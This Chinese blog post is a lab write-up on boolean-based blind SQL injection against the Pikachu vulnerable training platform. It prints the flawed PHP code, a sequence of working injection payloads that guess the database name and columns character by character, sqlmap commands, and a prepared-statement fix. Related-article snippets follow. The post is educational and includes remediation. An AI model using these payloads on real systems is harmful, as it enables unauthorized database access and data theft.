pikachu基于boolian的盲注详解

最新推荐文章于 2025-08-09 23:55:41 发布
最新推荐文章于 2025-08-09 23:55:41 发布
阅读量973 收藏 17
点赞数 36
CC 4.0 BY-SA版权
分类专栏: 渗透注入 文章标签: web安全 php sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bbos2004/article/details/149888929

这是Pikachu平台中字符型SQL注入(含布尔判断特征) 的典型场景,存在明显的SQL注入漏洞,且特别适合布尔盲注测试,具体分析如下:

if(isset($_GET['submit']) && $_GET['name']!=null){
    $name=$_GET['name'];//这里没有做任何处理,直接拼到select里面去了
    $query="select id,email from member where username='$name'";//这里的变量是字符型,需要考虑闭合
    //mysqi_query不打印错误描述,即使存在注入,也不好判断
    $result=mysqli_query($link, $query);//
//     $result=execute($link, $query);
    if($result && mysqli_num_rows($result)==1){
        while($data=mysqli_fetch_assoc($result)){
            $id=$data['id'];
            $email=$data['email'];
            $html.="<p class='notice'>your uid:{$id} <br />your email is: {$email}</p>";
        }
    }else{

        $html.="<p class='notice'>您输入的username不存在,请重新输入!</p>";
    }
}

1. 漏洞核心特征

代码逻辑是:

  • 接收用户输入的name参数(无任何过滤)
  • 直接拼接到SQL查询:select id,email from member where username='$name'
  • 关键判断:仅当查询结果刚好有1条记录时,显示your uid:xxx;否则显示不存在

这种“非此即彼”的返回逻辑,正是布尔盲注的典型环境——可以通过构造条件判断语句,根据页面返回“存在”或“不存在”来推断信息。

2. 布尔盲注利用思路

由于只有两种返回状态(成功/失败),无法直接获取数据,需通过条件判断逐步猜解信息:

(1)验证注入点
1' and 1=1#
  • 拼接后SQL:select ... where username='1' and 1=1#'
  • 若页面显示your uid(存在),说明条件为真
1' and 1=2#
  • 若页面显示不存在,说明条件为假,确认存在布尔盲注漏洞。
(2)猜解数据库名(以长度为例)
1' and length(database())=7#
  • 若返回your uid,说明当前数据库名长度为7(Pikachu默认库名是pikachu,长度7)。
(3)逐字符猜解数据库名
1' and ascii(substr(database(),1,1))=112#

(4)猜解表名、字段名、数据

方法类似,例如猜解member表的字段:

1' and (select ascii(substr(column_name,1,1)) from information_schema.columns where table_name='member' limit 0,1)=105#

3. 为什么适合布尔盲注?

  • 无错误回显:mysqli_query不显示具体错误,无法用联合查询直接获取数据
  • 结果唯一判断:mysqli_num_rows($result)==1 只返回“存在1条”或“不存在”两种状态
  • 闭合简单:字符型单引号闭合,容易构造条件语句

4. 修复建议

  • 改用参数化查询(预处理语句),彻底杜绝注入:

    $stmt = mysqli_prepare($link, "select id,email from member where username=?");
mysqli_stmt_bind_param($stmt, 's', $name);
mysqli_stmt_execute($stmt);
$result = mysqli_stmt_get_result($stmt);
  • 限制输入格式:只允许字母、数字等合法字符,过滤单引号等特殊符号。

这种场景下,手动盲注效率较低,实际测试中可结合Burp Suite的爆破功能或编写脚本自动化猜解。

sqlmap方法

获取数据库用户名
sqlmap -u "https://pikachu.guixinan.com/vul/sqli/sqli_blind_b.php?name=test&submit=查询" --dbs --batch
获取数据库表名
sqlmap -u "https://pikachu.guixinan.com/vul/sqli/sqli_blind_b.phpp?name=test&submit=查询" --D 数据库用户名 --tables --batch
获取对应数据库表的信息

pikachu基于boolian的盲注详解 - Java程序员_编程开发学习笔记_网站安全运维教程_渗透技术教程

pikachu靶场闯关
m0_73872485的博客
07-29 1610
概念:前端在功能设计中将要操作的文件使用变量的方式传递给了后台,而又没有进行严格的安全考虑而造成的,攻击者可能会通过“../”(返回上级目录)这样的手段让后台打开或者执行一些其他的文件从而导致后台服务器上其他目录的文件结果被遍历出来,形成目录遍历漏洞。一般越权漏洞容易出现在权限页面(需要登录的页面)增、删、改、查的的地方,当用户对权限页面内的信息进行这些操作时,后台需要对 对当前用户的权限进行校验,看其是否具备操作的权限,从而给出响应,而如果校验的规则过于简单则容易出现越权漏洞。-验证文件的上传方式;
pikachu——时间
Lollipop_zhi的博客
03-02 5152
如果是布尔,页面上会有0和1的变化,但是时间页面无变化,所以我们需要监控时间,通过后台执行时间来判断 首先输入’测试一下,时间0毫秒 输入kobe’ and 1=1#,时间还是0毫秒 借助sleep()函数,输入kobe’ and sleep(3)#,时间发生了变化 输入kobe’ and if ((substr(database(),1,1))=‘p’,sleep=(5),null)#,产生了延迟 substr(database(),1,1):截取数据库名称的第一个字符。 判断是否.
Pikachu布尔结合BurpSuite获取数据库名字详解
小小小屿屿屿的博客
11-18 909
有些情况下,开发人员屏蔽了报错信息,导致攻击者无法通过报错信息进行入的判断。这种情况下的入,称为根据展现方式,分为布尔型和时间型
网络安全学习之pikachu靶场详解
2401_87983229的博客
11-15 2802
1.Burt Force(暴力破解漏洞) 暴力破解概念: 暴力破解安全策略:
pikachu靶场总结
Fly_Mojito的博客
06-03 1384
pikachu靶场总结
pikachu靶场通关
热门推荐
无言道的博客
12-03 6万+
皮卡丘靶场详解,有什么问题可以在评论区留言。
pikachu靶场练习
qq_61081478的博客
02-04 689
这个函数吧,就是把单引号,双引号,尖括号过滤了,但是这个函数默认是不过滤单引号的,只有将quotestyle选项为ENT_QUOTES才会过滤单引号。DOM是一种用于表示和操作HTML、XML等文档结构的编程接口,通过它可以使用代码来访问、修改和操作Web页面的内容和结构。而且只有当页面刷新的时候,它的验证码才会重新刷新,想到有些服务器的后台是不会刷新验证码的,抓包验证一下。打也就是我们在前端并不能看到我们的代码,无法判断xss是否成功,只有在后台才能看到。2、输入正确的验证码,随便输入用户名和密码。
pikachu靶场搭建及模块练习
2301_80652627的博客
02-14 961
前提:小皮的下载安装。
Pikachu靶机通关和源码分析
Aiwin的博客
07-25 4704
Pikachu靶机通关和源码分析
pikachu SQL入 (皮卡丘漏洞平台通关系列)
箭雨镜屋
05-01 2万+
一、官方的戏精引言 本节引用来自pikachu漏洞靶场 哦,SQL入漏洞,可怕的漏洞。 在owasp发布的top10排行榜里,入漏洞一直是危害排名第一的漏洞,其中入漏洞里面首当其冲的就是数据库入漏洞。一个严重的SQL入漏洞,可能会直接导致一家公司破产! SQL入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。 ...
11.SQL入-基于(base on boolian)
愿听风成曲
07-05 431
输入kobe直接返回正确的信息,输入kobe’ and 1=1#也返回了正确的信息,证明and被后台执行了。根据payload语句执行成功,则可以判断出数据库第一个字符ascii=112,转换成字符为p。输入的内容是否正确,返回的信息比较少,只有两种返回结果:正确或者是用户名不存在。通过上面的图例子,我们可以利用左右都为真,则判断数据库名称的字符,多次进行测试。现在则继续测试第二个字符,我这里是多次测试得出来得结果105转换字符为:i。同样也可以进行爆出该数据库下的表名的字符,数字为104转成字符为h。
pikachu靶场-SQL-Inject
braty_的博客
02-23 1605
在owasp发布的top10排行榜里,入漏洞一直是危害排名第一的漏洞,其中入漏洞里面首当其冲的就是数据库入漏洞。一个严重的SQL入漏洞,可能会直接导致一家公司破产!SQL入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
pikachu——布尔
10-03
基于引用和引用的内容,布尔是一种入攻击技术,它利用了数据库的布尔逻辑。在布尔中,攻击者通过构造不同的SQL语句来判断查询的结果是真还是假,从而获取敏感信息。通过输入不同的条件,攻击者可以观察到...
15. 完成pikachu靶场中(base on boolian)题,获取该网站所使用的mysql版本、数据库名、数据库中所含的表,用户表中的所有用户名和密码 16. 完成pikachu靶场中(base on time)题,获取该网站所使用的mysql版本、数据库名、数据库中所含的表,用户表中的所有用户名和密码
03-11
嗯,用户想解决pikachu靶场中的布尔型和时间型SQL题目,目标是获取MySQL版本、数据库名、表结构以及用户表中的用户名和密码。首先,我得回忆一下SQL的基本原理。布尔和时间主要是在没有直接回显的...
后量子时代已至?中国量子加密技术突破与网络安全新基建
yundun_no1的博客
08-05 567
量子计算机的算力突破可能让现有的RSA、ECC等公钥加密算法在数分钟内被破解,这对金融、通信、政务等关键领域的信息安全构成致命威胁。为此,全球加速布局抗量子攻击的加密技术,中国更是在量子加密领域实现多项突破,推动网络安全新基建迈向“量子时代”。后量子时代并非遥远的未来,中国以技术突破、应用示范与制度保障的三维布局,正为数字经济构筑坚不可摧的安全防线。从“墨子号”卫星到千公里量子通话,从实验室算法到百万级用户网络,量子加密技术不仅守护当下,更在定义未来的信息安全规则。
安全合规2--网络安全等级保护2.0介绍
2301_76981288的博客
08-07 1125
根据信息/系统对。
Web安全Sql入之SqlServer和MySQL的区别
qinjilll的博客
08-08 690
SQL入在SQLServer与MySQL中的差异主要体现在语法特性上:SQLServer使用--释(需空格)和+连接字符串,而MySQL支持#释和CONCAT()函数;元数据查询方面,SQLServer通过系统视图(如sys.tables),MySQL则使用information_schema;堆叠查询在SQLServer中更易实现,MySQL依赖特定驱动;函数也不同(SQLServer用WAITFOR DELAY,MySQL用SLEEP)。此外,SQLServer可通过xp_cmdshell执行
微软推出革命性AI安全工具Project IRE,重塑网络安全防御新范式
最新发布
Bar_artist的博客
08-09 481
Project IRE AI代表了逆向工程领域的技术飞跃,它通过整合传统安全分析工具与前沿AI能力,构建了前所未有的恶意软件检测体系。作为微软安全生态系统的重要组成部分,Project IRE AI的推出象征着AI在网络安全领域的角色转变——从辅助工具升级为主动防御的核心力量,为自动化威胁检测设立了全新行业标准。Project IRE AI带来的不仅是技术升级,更是一场防御理念的革命:从被动响应到主动预防,AI正成为网络安全攻防战中最具决定性的战略要素。核心技术解析:AI驱动的逆向工程革命。
PeiQi网络安全知识文库PeiQi-WIKI-Book保姆式搭建部署教程
star010-的博客
08-08 231
PeiQi文库是一个面向网络安全从业者的知识库,涵盖漏洞研究、代码审计、CTF等内容,旨在解决安全资料分散问题。部署需先安装Node.js和npm,然后通过yarn安装运行。项目文件约2G,可从Github或国内Gitee下载。启动后默认运行在8080端口,适合安全从业者学习参考和漏洞验证。部署过程中需意yarn版本问题,必要时更新npm和Node.js。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值